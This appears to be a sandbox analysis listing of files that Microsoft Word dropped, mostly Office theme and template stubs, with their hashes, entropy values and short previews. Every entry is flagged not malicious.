                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):374
                                                                                                                                                        Entropy (8bit):3.5414485333689694
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                                        MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):47296
                                                                                                                                                        Entropy (8bit):6.42327948041841
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.538396048757031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: sist02.xsl Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {My Templates} Command: /f {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250983
                                                                                                                                                        Entropy (8bit):5.057714239438731
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):258
                                                                                                                                                        Entropy (8bit):3.4692172273306268
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                        SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                        SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                        SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: pictureorgchart.glox Component: WordFiles ReqVer: 14 StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7370
                                                                                                                                                        Entropy (8bit):7.9204386289679745
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):486596
                                                                                                                                                        Entropy (8bit):7.668294441507828
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.535303979138867
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                        SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                        SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                        SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: View.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):570901
                                                                                                                                                        Entropy (8bit):7.674434888248144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.5459495297497368
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                        SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                        SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                        SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Dividend.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):558035
                                                                                                                                                        Entropy (8bit):7.696653383430889
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5361139545278144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                        SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                        SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                        SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Basis.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):523048
                                                                                                                                                        Entropy (8bit):7.715248170753013
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):276
                                                                                                                                                        Entropy (8bit):3.5159096381406645
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                        SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                        SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                        SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Frame.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):562113
                                                                                                                                                        Entropy (8bit):7.67409707491542
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.535736910133401
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                        SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                        SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                        SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Banded.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):777647
                                                                                                                                                        Entropy (8bit):7.689662652914981
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5091498509646044
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                        SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                        SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                        SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Metropolitan.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):608122
                                                                                                                                                        Entropy (8bit):7.729143855239127
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.516359852766808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                                        SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                                        SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                                        SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File] OriginalName: Parcel.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):924687
                                                                                                                                                        Entropy (8bit):7.824849396154325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.51145753448333
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                        SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                        SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                        SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1649585
                                                                                                                                                        Entropy (8bit):7.875240099125746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284
                                                                                                                                                        Entropy (8bit):3.5552837910707304
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                        SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                        SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                                        SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):966946
                                                                                                                                                        Entropy (8bit):7.8785200658952
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                        Malicious:false
